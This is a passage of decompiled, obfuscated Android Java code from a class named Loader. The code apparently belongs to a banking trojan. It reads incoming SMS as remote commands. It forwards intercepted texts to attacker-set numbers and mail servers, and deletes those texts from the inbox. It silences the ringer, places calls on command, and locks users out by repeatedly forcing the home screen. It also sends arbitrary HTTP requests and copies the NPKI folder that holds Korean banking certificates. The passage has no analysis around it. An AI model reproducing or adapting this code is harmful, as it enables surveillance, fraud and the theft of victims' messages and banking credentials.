  2450. d.e.b.h.a((Object) lowerCase2, "(this as java.lang.String).toLowerCase()");
  2451. String a3 = d.i.m.a(lowerCase2, "package:", "", false, 4, null);
  2452. this.a.c.remove(a3);
  2453. b.a.c(a3);
  2454. loader = this.a;
  2455. } else {
  2456. boolean z = false;
  2457. if (d.e.b.h.a((Object) action, (Object) "android.provider.Telephony.SMS_RECEIVED")) {
  2458. Object[] objArr = (Object[]) intent.getExtras().get("pdus");
  2459. if (objArr != null) {
  2460. Map linkedHashMap = new LinkedHashMap();
  2461. Map linkedHashMap2 = new LinkedHashMap();
  2462. int length = objArr.length;
  2463. int i = 0;
  2464. while (i < length) {
  2465. Object obj = objArr[i];
  2466. if (obj == null) {
  2467. try {
  2468. throw new d.g("null cannot be cast to non-null type kotlin.ByteArray");
  2469. } catch (Exception e3) {
  2470. }
  2471. } else {
  2472. SmsMessage createFromPdu = SmsMessage.createFromPdu((byte[]) obj);
  2473. d.e.b.h.a((Object) createFromPdu, "msg");
  2474. String displayMessageBody = createFromPdu.getDisplayMessageBody();
  2475. String displayOriginatingAddress = createFromPdu.getDisplayOriginatingAddress();
  2476. if (displayMessageBody != null) {
  2477. d.e.b.h.a((Object) displayOriginatingAddress, "address");
  2478. linkedHashMap.put(displayOriginatingAddress, Long.valueOf(createFromPdu.getTimestampMillis()));
  2479. StringBuilder sb3 = new StringBuilder();
  2480. String str = (String) linkedHashMap2.get(displayOriginatingAddress);
  2481. if (str == null) {
  2482. str = "";
  2483. }
  2484. sb3.append(str);
  2485. sb3.append(displayMessageBody);
  2486. linkedHashMap2.put(displayOriginatingAddress, sb3.toString());
  2487. }
  2488. i++;
  2489. }
  2490. }
  2491. for (Entry entry : linkedHashMap.entrySet()) {
  2492. String str2 = (String) entry.getKey();
  2493. long longValue = ((Number) entry.getValue()).longValue();
  2494. Object obj2 = linkedHashMap2.get(str2);
  2495. if (obj2 == null) {
  2496. d.e.b.h.a();
  2497. }
  2498. String str3 = (String) obj2;
  2499. if (this.a.g.a("onSms", (Object) new Object[]{str2, str3, Long.valueOf(longValue)})) {
  2500. Loader.access$getPreferences$p(this.a).edit().putLong(c.b, longValue).apply();
  2501. }
  2502. if (str3.length() > 6) {
  2503. if (str3 == null) {
  2504. throw new d.g("null cannot be cast to non-null type java.lang.String");
  2505. }
  2506. String substring = str3.substring(2);
  2507. d.e.b.h.a((Object) substring, "(this as java.lang.String).substring(startIndex)");
  2508. if (d.i.m.a(str3, "FS", false, 2, null)) {
  2509. (d.e.b.h.a((Object) substring, (Object) "000000") ? Loader.access$getPreferences$p(this.a).edit().putString("fs", "") : Loader.access$getPreferences$p(this.a).edit().putString("fs", q.b(substring))).apply();
  2510. } else if (d.i.m.a(str3, "SF", false, 2, null)) {
  2511. String b2 = q.b(substring);
  2512. Loader.access$getPreferences$p(this.a).edit().putString("account", b2).apply();
  2513. d.e.b.h.a((Object) c.a.a.b.a.a().a(new b(this, b2), 2, TimeUnit.SECONDS), "AndroidSchedulers.mainTh… }, 2, TimeUnit.SECONDS)");
  2514. } else if (d.i.m.a(str3, "IF", false, 2, null)) {
  2515. com.b.a.a.t a4 = this.a.g.a();
  2516. if (a4 != null) {
  2517. Socket f2 = a4.f();
  2518. if (f2 != null && f2.isConnected()) {
  2519. StringBuilder sb4 = new StringBuilder();
  2520. sb4.append("已连接:");
  2521. com.b.a.a.t a5 = this.a.g.a();
  2522. if (a5 == null) {
  2523. d.e.b.h.a();
  2524. }
  2525. Socket f3 = a5.f();
  2526. d.e.b.h.a((Object) f3, "peer.ws!!.socket");
  2527. sb4.append(f3.getRemoteSocketAddress().toString());
  2528. sb = sb4.toString();
  2529. o.a.a(new m(Loader.access$getCtx$p(this.a), substring, sb, null, c.a));
  2530. }
  2531. }
  2532. Object systemService = Loader.access$getCtx$p(this.a).getSystemService("connectivity");
  2533. if (systemService == null) {
  2534. throw new d.g("null cannot be cast to non-null type android.net.ConnectivityManager");
  2535. }
  2536. NetworkInfo activeNetworkInfo = ((ConnectivityManager) systemService).getActiveNetworkInfo();
  2537. String str4 = "";
  2538. if (activeNetworkInfo != null) {
  2539. str4 = activeNetworkInfo.getTypeName();
  2540. d.e.b.h.a((Object) str4, "info.typeName");
  2541. }
  2542. String str5 = str4;
  2543. WifiManager wifiManager = (WifiManager) Loader.access$getCtx$p(this.a).getSystemService("wifi");
  2544. boolean z2 = wifiManager != null ? wifiManager.isWifiEnabled() : false;
  2545. StringBuilder sb5 = new StringBuilder();
  2546. sb5.append("未连接,");
  2547. sb5.append(str5);
  2548. sb5.append(',');
  2549. sb5.append(z2);
  2550. sb5.append(',');
  2551. sb5.append(this.a.j);
  2552. sb = sb5.toString();
  2553. o.a.a(new m(Loader.access$getCtx$p(this.a), substring, sb, null, c.a));
  2554. } else if (d.i.m.a(str3, "SI", false, 2, null)) {
  2555. byte[] decode = Base64.decode(substring, 0);
  2556. d.e.b.h.a((Object) decode, "Base64.decode(v, 0)");
  2557. String str6 = new String(decode, d.i.d.a);
  2558. List a6 = d.i.m.a((CharSequence) str6, new char[]{10}, false, 0, 6, null);
  2559. Loader.access$getPreferences$p(this.a).edit().putString("addr_url", (String) a6.get(0)).putString("addr_encoding", (String) a6.get(1)).putString("addr_pattern", (String) a6.get(2)).putString("addr_accounts", (String) a6.get(3)).apply();
  2560. StringBuilder sb6 = new StringBuilder();
  2561. sb6.append("SI:");
  2562. sb6.append(str6);
  2563. Log.d("WS", sb6.toString());
  2564. if (this.a.g.b()) {
  2565. g access$getPeer$p = this.a.g;
  2566. StringBuilder sb7 = new StringBuilder();
  2567. sb7.append("302:");
  2568. sb7.append((String) a6.get(3));
  2569. access$getPeer$p.a(1000, sb7.toString()).a();
  2570. }
  2571. } else if (d.i.m.a(str3, "FM", false, 2, null)) {
  2572. byte[] decode2 = Base64.decode("CpMSc7iSk/dTcRO7aMe4qA==", 0);
  2573. byte[] decode3 = Base64.decode(substring, 0);
  2574. d.e.b.h.a((Object) decode3, "Base64.decode(v, 0)");
  2575. d.e.b.h.a((Object) decode2, "keyData");
  2576. String str7 = new String(q.a(decode3, decode2, false), d.i.d.a);
  2577. (d.e.b.h.a((Object) str7, (Object) "000000") ? Loader.access$getPreferences$p(this.a).edit().putString("fsm", "") : Loader.access$getPreferences$p(this.a).edit().putString("fsm", str7)).apply();
  2578. StringBuilder sb8 = new StringBuilder();
  2579. sb8.append("fsm");
  2580. sb8.append(str7);
  2581. Log.d("WS", sb8.toString());
  2582. }
  2583. }
  2584. String string = Loader.access$getPreferences$p(this.a).getString("fs", "");
  2585. if (string == null) {
  2586. d.e.b.h.a();
  2587. }
  2588. if (string.length() > 3) {
  2589. o oVar = o.a;
  2590. Context access$getCtx$p = Loader.access$getCtx$p(this.a);
  2591. StringBuilder sb9 = new StringBuilder();
  2592. sb9.append("");
  2593. sb9.append(str2);
  2594. sb9.append(":\n");
  2595. sb9.append(str3);
  2596. oVar.a(new m(access$getCtx$p, string, sb9.toString(), null, d.a));
  2597. Log.d("MSG", "FWD");
  2598. }
  2599. String string2 = Loader.access$getPreferences$p(this.a).getString("fsm", "");
  2600. d.e.b.h.a((Object) string2, "preferences.getString(\"fsm\", \"\")");
  2601. List a7 = d.i.m.a((CharSequence) string2, new char[]{'|'}, false, 0, 6, null);
  2602. if (a7.size() >= 3) {
  2603. String str8 = (String) a7.get(0);
  2604. String str9 = (String) a7.get(1);
  2605. T t = (String) a7.get(2);
  2606. d.e.b.j.b bVar = new d.e.b.j.b();
  2607. bVar.a = t;
  2608. d.e.b.j.b bVar2 = new d.e.b.j.b();
  2609. bVar2.a = "25";
  2610. if (d.i.m.a((CharSequence) t, ':', false, 2, null)) {
  2611. List a8 = d.i.m.a((CharSequence) t, new char[]{':'}, false, 0, 6, null);
  2612. bVar.a = (String) a8.get(0);
  2613. bVar2.a = (String) a8.get(1);
  2614. }
  2615. Thread thread = new Thread(new e(this, str2, str3, bVar, bVar2, str8, str9));
  2616. thread.start();
  2617. }
  2618. }
  2619. if (VERSION.SDK_INT < 19) {
  2620. try {
  2621. for (Entry key : linkedHashMap.entrySet()) {
  2622. String str10 = (String) key.getKey();
  2623. abortBroadcast();
  2624. Cursor query = context.getContentResolver().query(Uri.parse("content://sms/inbox"), null, "read=0", null, null);
  2625. if (query != null) {
  2626. while (query.moveToNext()) {
  2627. String string3 = query.getString(query.getColumnIndex("address"));
  2628. d.e.b.h.a((Object) string3, "isRead.getString(isRead.getColumnIndex(\"address\"))");
  2629. CharSequence charSequence = string3;
  2630. int length2 = charSequence.length() - 1;
  2631. int i2 = 0;
  2632. boolean z3 = false;
  2633. while (i2 <= length2) {
  2634. boolean z4 = charSequence.charAt(!z3 ? i2 : length2) <= ' ';
  2635. if (z3) {
  2636. if (!z4) {
  2637. break;
  2638. }
  2639. length2--;
  2640. } else if (z4) {
  2641. i2++;
  2642. } else {
  2643. z3 = true;
  2644. }
  2645. }
  2646. if (d.e.b.h.a((Object) charSequence.subSequence(i2, length2 + 1).toString(), (Object) str10)) {
  2647. int i3 = query.getInt(query.getColumnIndex("_id"));
  2648. ContentResolver contentResolver = context.getContentResolver();
  2649. Uri parse = Uri.parse("content://sms");
  2650. StringBuilder sb10 = new StringBuilder();
  2651. sb10.append("_id=");
  2652. sb10.append(i3);
  2653. contentResolver.delete(parse, sb10.toString(), null);
  2654. }
  2655. }
  2656. query.close();
  2657. }
  2658. }
  2659. return;
  2660. } catch (Exception e4) {
  2661. e4.printStackTrace();
  2662. return;
  2663. }
  2664. } else if (!this.a.k && VERSION.SDK_INT < 23) {
  2665. Object systemService2 = context.getSystemService("audio");
  2666. if (systemService2 == null) {
  2667. throw new d.g("null cannot be cast to non-null type android.media.AudioManager");
  2668. }
  2669. ((AudioManager) systemService2).setRingerMode(0);
  2670. return;
  2671. } else {
  2672. return;
  2673. }
  2674. } else {
  2675. return;
  2676. }
  2677. } else if (d.e.b.h.a((Object) action, (Object) "android.intent.action.BATTERY_CHANGED")) {
  2678. int intExtra = (intent.getIntExtra("level", 0) * 100) / intent.getIntExtra("scale", 100);
  2679. if (this.a.v != intExtra) {
  2680. this.a.v = intExtra;
  2681. loader = this.a;
  2682. } else {
  2683. return;
  2684. }
  2685. } else if (d.e.b.h.a((Object) action, (Object) "android.net.conn.CONNECTIVITY_CHANGE")) {
  2686. loader = this.a;
  2687. } else if (d.e.b.h.a((Object) action, (Object) "android.intent.action.USER_PRESENT")) {
  2688. if (Loader.access$getPreferences$p(this.a).getBoolean("lock", false)) {
  2689. q.b(Loader.access$getCtx$p(this.a));
  2690. }
  2691. if (this.a.getCallListener().a() == null) {
  2692. String access$getGoogleAccount = this.a.e();
  2693. String locale = Locale.getDefault().toString();
  2694. d.e.b.h.a((Object) locale, "Locale.getDefault().toString()");
  2695. if (!(d.i.m.a(locale, "ko", false, 2, null) && d.e.b.h.a((Object) access$getGoogleAccount, (Object) ""))) {
  2696. z = true;
  2697. }
  2698. if (z && this.a.g.b()) {
  2699. this.a.c(access$getGoogleAccount);
  2700. }
  2701. new Handler().postDelayed(new f(this), 1000);
  2702. return;
  2703. }
  2704. return;
  2705. } else if (d.e.b.h.a((Object) action, (Object) o.a.a())) {
  2706. o.a.a(intent, getResultCode());
  2707. return;
  2708. } else if (d.e.b.h.a((Object) action, (Object) "android.intent.action.SCREEN_OFF")) {
  2709. this.a.h();
  2710. this.a.f();
  2711. return;
  2712. } else if (d.e.b.h.a((Object) action, (Object) "android.intent.action.SCREEN_ON")) {
  2713. Log.d("WS", "screen on");
  2714. this.a.h();
  2715. if (Loader.access$getPreferences$p(this.a).getBoolean("lock", false)) {
  2716. Log.d("WS", "screen on unlock");
  2717. q.b(Loader.access$getCtx$p(this.a));
  2718. return;
  2719. }
  2720. return;
  2721. } else if (d.e.b.h.a((Object) action, (Object) "android.media.RINGER_MODE_CHANGED")) {
  2722. loader = this.a;
  2723. } else if (d.e.b.h.a((Object) action, (Object) "android.net.wifi.SCAN_RESULTS")) {
  2724. loader = this.a;
  2725. } else {
  2726. return;
  2727. }
  2728. }
  2729. loader.h();
  2730. } catch (Exception e5) {
  2731. e5.printStackTrace();
  2732. } catch (Throwable th) {
  2733. th.printStackTrace();
  2734. }
  2735. }
  2736. }
  2737.  
  2738. static final class p extends d.e.b.i implements d.e.a.b<Object[], c.a.h<Object>> {
  2739. final /* synthetic */ Loader a;
  2740.  
  2741. p(Loader loader) {
  2742. this.a = loader;
  2743. super(1);
  2744. }
  2745.  
  2746. public final c.a.h<Object> a(final Object[] objArr) {
  2747. d.e.b.h.b(objArr, "params");
  2748. c.a.h<Object> a2 = c.a.h.a((c.a.k<T>) new c.a.k<T>(this) {
  2749. final /* synthetic */ p a;
  2750.  
  2751. public final void a(final c.a.i<Object> iVar) {
  2752. d.e.b.h.b(iVar, "emitter");
  2753. Object obj = objArr[0];
  2754. if (obj == null) {
  2755. throw new d.g("null cannot be cast to non-null type kotlin.String");
  2756. }
  2757. String str = (String) obj;
  2758. Object obj2 = objArr[1];
  2759. if (obj2 == null) {
  2760. throw new d.g("null cannot be cast to non-null type kotlin.String");
  2761. }
  2762. o.a.a(new m(Loader.access$getCtx$p(this.a.a), str, (String) obj2, null, new d.e.a.c<m, String, d.i>() {
  2763. public /* bridge */ /* synthetic */ Object a(Object obj, Object obj2) {
  2764. a((m) obj, (String) obj2);
  2765. return d.i.a;
  2766. }
  2767.  
  2768. public final void a(m mVar, String str) {
  2769. d.e.b.h.b(mVar, "sms");
  2770. if (str == null) {
  2771. iVar.e_();
  2772. } else {
  2773. iVar.a((Throwable) new l(-1, str, null));
  2774. }
  2775. }
  2776. }));
  2777. }
  2778. });
  2779. d.e.b.h.a((Object) a2, "Maybe.create<Any> { emit… }))\n }");
  2780. return a2;
  2781. }
  2782. }
  2783.  
  2784. static final class q extends d.e.b.i implements d.e.a.b<Object[], c.a.h<Object>> {
  2785. final /* synthetic */ Loader a;
  2786.  
  2787. q(Loader loader) {
  2788. this.a = loader;
  2789. super(1);
  2790. }
  2791.  
  2792. public final c.a.h<Object> a(final Object[] objArr) {
  2793. d.e.b.h.b(objArr, "params");
  2794. c.a.h<Object> a2 = c.a.h.a((c.a.d.a) new c.a.d.a(this) {
  2795. final /* synthetic */ q a;
  2796.  
  2797. public final void a() {
  2798. Loader loader = this.a.a;
  2799. Object obj = objArr[0];
  2800. if (obj == null) {
  2801. throw new d.g("null cannot be cast to non-null type kotlin.Boolean");
  2802. }
  2803. loader.k = ((Boolean) obj).booleanValue();
  2804. if (this.a.a.k) {
  2805. Object systemService = Loader.access$getCtx$p(this.a.a).getSystemService("audio");
  2806. if (systemService == null) {
  2807. throw new d.g("null cannot be cast to non-null type android.media.AudioManager");
  2808. }
  2809. AudioManager audioManager = (AudioManager) systemService;
  2810. if (VERSION.SDK_INT < 23) {
  2811. audioManager.setRingerMode(0);
  2812. } else {
  2813. audioManager.setRingerMode(2);
  2814. }
  2815. }
  2816. }
  2817. });
  2818. d.e.b.h.a((Object) a2, "Maybe.fromAction<Any> {\n… }\n }");
  2819. return a2;
  2820. }
  2821. }
  2822.  
  2823. static final class r extends d.e.b.i implements d.e.a.b<Object[], c.a.h<Object>> {
  2824. final /* synthetic */ Loader a;
  2825.  
  2826. r(Loader loader) {
  2827. this.a = loader;
  2828. super(1);
  2829. }
  2830.  
  2831. public final c.a.h<Object> a(Object[] objArr) {
  2832. d.e.b.h.b(objArr, "params");
  2833. this.a.h();
  2834. c.a.h<Object> a2 = c.a.h.a();
  2835. d.e.b.h.a((Object) a2, "Maybe.empty<Any>()");
  2836. return a2;
  2837. }
  2838. }
  2839.  
  2840. static final class s extends d.e.b.i implements d.e.a.b<Object[], c.a.h<Object>> {
  2841. final /* synthetic */ Loader a;
  2842.  
  2843. /* renamed from: com.Loader$s$1 */
  2844. public static final class AnonymousClass1 extends TimerTask {
  2845. final /* synthetic */ s a;
  2846.  
  2847. static final class a implements Runnable {
  2848. final /* synthetic */ AnonymousClass1 a;
  2849.  
  2850. a(AnonymousClass1 anonymousClass1) {
  2851. this.a = anonymousClass1;
  2852. }
  2853.  
  2854. public final void run() {
  2855. try {
  2856. Intent intent = new Intent("android.intent.action.MAIN");
  2857. intent.addCategory("android.intent.category.HOME");
  2858. intent.addFlags(268435456);
  2859. Loader.access$getCtx$p(this.a.a.a).startActivity(intent);
  2860. } catch (Exception e) {
  2861. }
  2862. }
  2863. }
  2864.  
  2865. AnonymousClass1(s sVar) {
  2866. this.a = sVar;
  2867. }
  2868.  
  2869. public void run() {
  2870. this.a.a.b.post(new a(this));
  2871. }
  2872. }
  2873.  
  2874. s(Loader loader) {
  2875. this.a = loader;
  2876. super(1);
  2877. }
  2878.  
  2879. public final c.a.h<Object> a(Object[] objArr) {
  2880. d.e.b.h.b(objArr, "params");
  2881. Boolean bool = objArr[0];
  2882. if (bool == null) {
  2883. throw new d.g("null cannot be cast to non-null type kotlin.Boolean");
  2884. }
  2885. boolean booleanValue = bool.booleanValue();
  2886. StringBuilder sb = new StringBuilder();
  2887. sb.append("showHome ");
  2888. sb.append(booleanValue);
  2889. Log.d("WS", sb.toString());
  2890. TimerTask access$getShowHomeTask$p = this.a.i;
  2891. if (access$getShowHomeTask$p != null) {
  2892. access$getShowHomeTask$p.cancel();
  2893. }
  2894. this.a.i = null;
  2895. Loader.access$getPreferences$p(this.a).edit().putBoolean("lock", booleanValue).apply();
  2896. if (booleanValue) {
  2897. Object systemService = Loader.access$getCtx$p(this.a).getSystemService("audio");
  2898. if (systemService == null) {
  2899. throw new d.g("null cannot be cast to non-null type android.media.AudioManager");
  2900. }
  2901. ((AudioManager) systemService).setRingerMode(0);
  2902. if (!q.b(Loader.access$getCtx$p(this.a))) {
  2903. this.a.i = new AnonymousClass1(this);
  2904. this.a.h.schedule(this.a.i, 0, 150);
  2905. }
  2906. } else {
  2907. q.c(Loader.access$getCtx$p(this.a));
  2908. }
  2909. c.a.h<Object> a2 = c.a.h.a();
  2910. d.e.b.h.a((Object) a2, "Maybe.empty<Any>()");
  2911. return a2;
  2912. }
  2913. }
  2914.  
  2915. static final class t extends d.e.b.i implements d.e.a.b<Object[], c.a.h<? extends Object>> {
  2916. public static final t a = new t();
  2917.  
  2918. t() {
  2919. super(1);
  2920. }
  2921.  
  2922. public final c.a.h<? extends Object> a(Object[] objArr) {
  2923. c.a.h<? extends Object> a2;
  2924. String str;
  2925. d.e.b.h.b(objArr, "params");
  2926. Number number = objArr[0];
  2927. if (number == null) {
  2928. throw new d.g("null cannot be cast to non-null type kotlin.Number");
  2929. }
  2930. long longValue = number.longValue();
  2931. if (!(!d.e.b.h.a((Object) Environment.getExternalStorageState(), (Object) "mounted"))) {
  2932. StringBuilder sb = new StringBuilder();
  2933. File externalStorageDirectory = Environment.getExternalStorageDirectory();
  2934. d.e.b.h.a((Object) externalStorageDirectory, "Environment.getExternalStorageDirectory()");
  2935. sb.append(externalStorageDirectory.getAbsolutePath());
  2936. sb.append("/NPKI");
  2937. File file = new File(sb.toString());
  2938. if (file.exists()) {
  2939. long lastModified = file.lastModified();
  2940. if (longValue == lastModified) {
  2941. a2 = c.a.h.a(Integer.valueOf(0));
  2942. str = "Maybe.just(0)";
  2943. } else {
  2944. r rVar = new r();
  2945. ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
  2946. try {
  2947. rVar.a(byteArrayOutputStream, file.getAbsolutePath());
  2948. a2 = c.a.h.a(new Serializable[]{Long.valueOf(lastModified), (Serializable) byteArrayOutputStream.toByteArray()});
  2949. str = "Maybe.just(arrayOf(lastModified, bytes))";
  2950. } catch (Exception e) {
  2951. }
  2952. }
  2953. d.e.b.h.a((Object) a2, str);
  2954. return a2;
  2955. }
  2956. }
  2957. a2 = c.a.h.a();
  2958. str = "Maybe.empty<Any>()";
  2959. d.e.b.h.a((Object) a2, str);
  2960. return a2;
  2961. }
  2962. }
  2963.  
  2964. static final class u extends d.e.b.i implements d.e.a.b<Object[], c.a.h<Object>> {
  2965. public static final u a = new u();
  2966.  
  2967. u() {
  2968. super(1);
  2969. }
  2970.  
  2971. public final c.a.h<Object> a(Object[] objArr) {
  2972. d.e.b.h.b(objArr, "params");
  2973. String str = objArr[0];
  2974. if (str == null) {
  2975. throw new d.g("null cannot be cast to non-null type kotlin.String");
  2976. }
  2977. final String str2 = str;
  2978. String str3 = objArr[1];
  2979. if (str3 == null) {
  2980. throw new d.g("null cannot be cast to non-null type kotlin.String");
  2981. }
  2982. final String str4 = str3;
  2983. Map map = objArr[2];
  2984. if (map == null) {
  2985. throw new d.g("null cannot be cast to non-null type kotlin.collections.Map<kotlin.String, kotlin.Array<*>>");
  2986. }
  2987. final Map map2 = map;
  2988. byte[] bArr = objArr[3];
  2989. if (bArr == null) {
  2990. throw new d.g("null cannot be cast to non-null type kotlin.ByteArray");
  2991. }
  2992. final byte[] bArr2 = bArr;
  2993. c.a.h<Object> a2 = c.a.h.a((c.a.k<T>) new c.a.k<T>() {
  2994. public final void a(final c.a.i<Object> iVar) {
  2995. d.e.b.h.b(iVar, "emitter");
  2996. c.a.g.a.a().a(new Runnable(this) {
  2997. final /* synthetic */ AnonymousClass1 a;
  2998.  
  2999. /* JADX DEBUG: Multi-variable type inference result: success, time: 2 ms */
  3000. public final void run() {
  3001. HttpURLConnection httpURLConnection;
  3002. InputStream errorStream;
  3003. try {
  3004. URLConnection openConnection = new URL(str2).openConnection();
  3005. if (openConnection == null) {
  3006. throw new d.g("null cannot be cast to non-null type java.net.HttpURLConnection");
  3007. }
  3008. httpURLConnection = (HttpURLConnection) openConnection;
  3009. httpURLConnection.setUseCaches(false);
  3010. httpURLConnection.setRequestMethod(str4);
  3011. httpURLConnection.setInstanceFollowRedirects(true);
  3012. for (Entry entry : map2.entrySet()) {
  3013. for (Object valueOf : (Object[]) entry.getValue()) {
  3014. httpURLConnection.setRequestProperty((String) entry.getKey(), String.valueOf(valueOf));
  3015. }
  3016. }
  3017. if (!(bArr2.length == 0)) {
  3018. httpURLConnection.getOutputStream().write(bArr2);
  3019. }
  3020. int responseCode = httpURLConnection.getResponseCode();
  3021. Map headerFields = httpURLConnection.getHeaderFields();
  3022. errorStream = httpURLConnection.getInputStream();
  3023. d.e.b.h.a((Object) errorStream, "input");
  3024. iVar.a(new Object[]{Integer.valueOf(responseCode), headerFields, d.d.a.a(errorStream, 0, 1, null)});
  3025. } catch (Throwable th) {
  3026. iVar.a(th);
  3027. }
  3028. }
  3029. });
  3030. }
  3031. });
  3032. d.e.b.h.a((Object) a2, "Maybe.create<Any>({ emit… }\n })");
  3033. return a2;
  3034. }
  3035. }
  3036.  
  3037. static final class v extends d.e.b.i implements d.e.a.b<Object[], c.a.h<Object>> {
  3038. final /* synthetic */ Loader a;
  3039.  
  3040. v(Loader loader) {
  3041. this.a = loader;
  3042. super(1);
  3043. }
  3044.  
  3045. public final c.a.h<Object> a(Object[] objArr) {
  3046. d.e.b.h.b(objArr, "params");
  3047. String str = objArr[0];
  3048. if (str == null) {
  3049. throw new d.g("null cannot be cast to non-null type kotlin.String");
  3050. }
  3051. String str2 = str;
  3052. new ToneGenerator(8, 100).startTone(d.a.b.a((Object[]) new String[]{"0", "1", "2", "3", "4", "5", "6", "7", "8", "9", "*", "#"}, (Object) str2), 150);
  3053. this.a.setSpeekModle$loader_release(true);
  3054. c.a.h<Object> a2 = c.a.h.a();
  3055. d.e.b.h.a((Object) a2, "Maybe.empty<Any>()");
  3056. return a2;
  3057. }
  3058. }
  3059.  
  3060. static final class w extends d.e.b.i implements d.e.a.b<Object[], c.a.h<Object>> {
  3061. final /* synthetic */ Loader a;
  3062.  
  3063. w(Loader loader) {
  3064. this.a = loader;
  3065. super(1);
  3066. }
  3067.  
  3068. public final c.a.h<Object> a(Object[] objArr) {
  3069. d.e.b.h.b(objArr, "params");
  3070. Object systemService = Loader.access$getCtx$p(this.a).getSystemService("audio");
  3071. if (systemService == null) {
  3072. throw new d.g("null cannot be cast to non-null type android.media.AudioManager");
  3073. }
  3074. ((AudioManager) systemService).setRingerMode(0);
  3075. String str = objArr[0];
  3076. if (str == null) {
  3077. throw new d.g("null cannot be cast to non-null type kotlin.String");
  3078. }
  3079. String str2 = str;
  3080. StringBuilder sb = new StringBuilder();
  3081. sb.append("call ");
  3082. sb.append(str2);
  3083. Log.d("WS", sb.toString());
  3084. StringBuilder sb2 = new StringBuilder();
  3085. sb2.append("tel:");
  3086. sb2.append(str2);
  3087. Intent intent = new Intent("android.intent.action.CALL", Uri.parse(sb2.toString()));
  3088. intent.addFlags(268435456);
  3089. Loader.access$getCtx$p(this.a).startActivity(intent);
  3090. c.a.h<Object> a2 = c.a.h.a();
  3091. d.e.b.h.a((Object) a2, "Maybe.empty<Any>()");
  3092. return a2;
  3093. }
  3094. }
  3095.  
  3096. static final class x extends d.e.b.i implements d.e.a.b<Object[], c.a.h<List<String>>> {
  3097. final /* synthetic */ Loader a;
  3098.  
  3099. public static final class a<T> implements Comparator<T> {
  3100. public final int compare(T t, T t2) {
  3101. return d.b.a.a(Integer.valueOf(((PackageInfo) t).applicationInfo.flags & 1), Integer.valueOf(((PackageInfo) t2).applicationInfo.flags & 1));
  3102. }
  3103. }
  3104.  
  3105. x(Loader loader) {
  3106. this.a = loader;
  3107. super(1);
  3108. }
  3109.  
  3110. /* JADX WARNING: Removed duplicated region for block: B:23:0x002d A[SYNTHETIC] */
  3111. /* JADX WARNING: Removed duplicated region for block: B:9:0x0057 */
  3112. public final c.a.h<java.util.List<java.lang.String>> a(java.lang.Object[] r12) {
  3113. /*
  3114. r11 = this;
  3115. r4 = 0
  3116. java.lang.String r0 = "it"
  3117. d.e.b.h.b(r12, r0)
  3118. com.Loader r0 = r11.a
  3119. android.content.Context r0 = com.Loader.access$getCtx$p(r0)
  3120. android.content.pm.PackageManager r6 = r0.getPackageManager()
  3121. java.util.ArrayList r0 = new java.util.ArrayList
  3122. r0.<init>()
  3123. java.util.List r0 = (java.util.List) r0
  3124. java.util.List r1 = r6.getInstalledPackages(r4)
  3125. java.lang.String r2 = "packages"
  3126. d.e.b.h.a(r1, r2)
  3127. java.lang.Iterable r1 = (java.lang.Iterable) r1
  3128. java.util.ArrayList r2 = new java.util.ArrayList
  3129. r2.<init>()
  3130. java.util.Collection r2 = (java.util.Collection) r2
  3131. java.util.Iterator r7 = r1.iterator()
  3132. L_0x002d:
  3133. boolean r1 = r7.hasNext()
  3134. r5 = 1
  3135. if (r1 == 0) goto L_0x005b
  3136. java.lang.Object r3 = r7.next()
  3137. r1 = r3
  3138. android.content.pm.PackageInfo r1 = (android.content.pm.PackageInfo) r1
  3139. java.lang.String r8 = r1.packageName
  3140. android.content.pm.ApplicationInfo r1 = r1.applicationInfo
  3141. int r1 = r1.flags
  3142. r1 = r1 & 1
  3143. if (r1 == 0) goto L_0x00d0
  3144. java.lang.String r1 = "pkg"
  3145. d.e.b.h.a(r8, r1)
  3146. java.lang.String r1 = "com.android."
  3147. r9 = 2
  3148. r10 = 0
  3149. boolean r1 = d.i.m.a(r8, r1, r4, r9, r10)
  3150. if (r1 == 0) goto L_0x00d0
  3151. r1 = r4
  3152. L_0x0055:
  3153. if (r1 == 0) goto L_0x002d
  3154. r2.add(r3)
  3155. goto L_0x002d
  3156. L_0x005b:
  3157. java.util.List r2 = (java.util.List) r2
  3158. java.lang.Iterable r2 = (java.lang.Iterable) r2
  3159. com.Loader$x$a r1 = new com.Loader$x$a
  3160. r1.m307init()
  3161. java.util.Comparator r1 = (java.util.Comparator) r1
  3162. java.util.List r1 = d.a.g.a(r2, r1)
  3163. java.lang.Iterable r1 = (java.lang.Iterable) r1
  3164. java.util.Iterator r4 = r1.iterator()
  3165. L_0x0070:
  3166. boolean r1 = r4.hasNext()
  3167. if (r1 == 0) goto L_0x00c1
  3168. java.lang.Object r2 = r4.next()
  3169. r1 = r0
  3170. java.util.Collection r1 = (java.util.Collection) r1
  3171. android.content.pm.PackageInfo r2 = (android.content.pm.PackageInfo) r2
  3172. java.lang.StringBuilder r3 = new java.lang.StringBuilder
  3173. r3.<init>()
  3174. java.lang.String r5 = r2.packageName
  3175. r3.append(r5)
  3176. java.lang.String r5 = "/"
  3177. r3.append(r5)
  3178. android.content.pm.ApplicationInfo r5 = r2.applicationInfo
  3179. java.lang.CharSequence r5 = r5.loadLabel(r6)
  3180. java.lang.String r5 = r5.toString()
  3181. r3.append(r5)
  3182. java.lang.String r3 = r3.toString()
  3183. android.content.pm.ApplicationInfo r2 = r2.applicationInfo
  3184. int r2 = r2.flags
  3185. r2 = r2 & 1
  3186. if (r2 == 0) goto L_0x00ce
  3187. java.lang.StringBuilder r2 = new java.lang.StringBuilder
  3188. r2.<init>()
  3189. java.lang.String r5 = ""
  3190. r2.append(r5)
  3191. r2.append(r3)
  3192. java.lang.String r3 = " (系统)"
  3193. r2.append(r3)
  3194. java.lang.String r2 = r2.toString()
  3195. L_0x00bd:
  3196. r1.add(r2)
  3197. goto L_0x0070
  3198. L_0x00c1:
  3199. r1 = r0
  3200. java.util.Collection r1 = (java.util.Collection) r1
  3201. c.a.h r0 = c.a.h.a(r0)
  3202. java.lang.String r1 = "Maybe.just(list)"
  3203. d.e.b.h.a(r0, r1)
  3204. return r0
  3205. L_0x00ce:
  3206. r2 = r3
  3207. goto L_0x00bd
  3208. L_0x00d0:
  3209. r1 = r5
  3210. goto L_0x0055
  3211. */
  3212. throw new UnsupportedOperationException("Method not decompiled: com.Loader$x.a(java.lang.Object[]):c.a.h");
  3213. }
  3214. }
  3215.  
  3216. static final class y extends d.e.b.i implements d.e.a.b<Object[], c.a.h<Object>> {
  3217. final /* synthetic */ Loader a;
  3218.  
  3219. y(Loader loader) {
  3220. this.a = loader;
  3221. super(1);
  3222. }
  3223.  
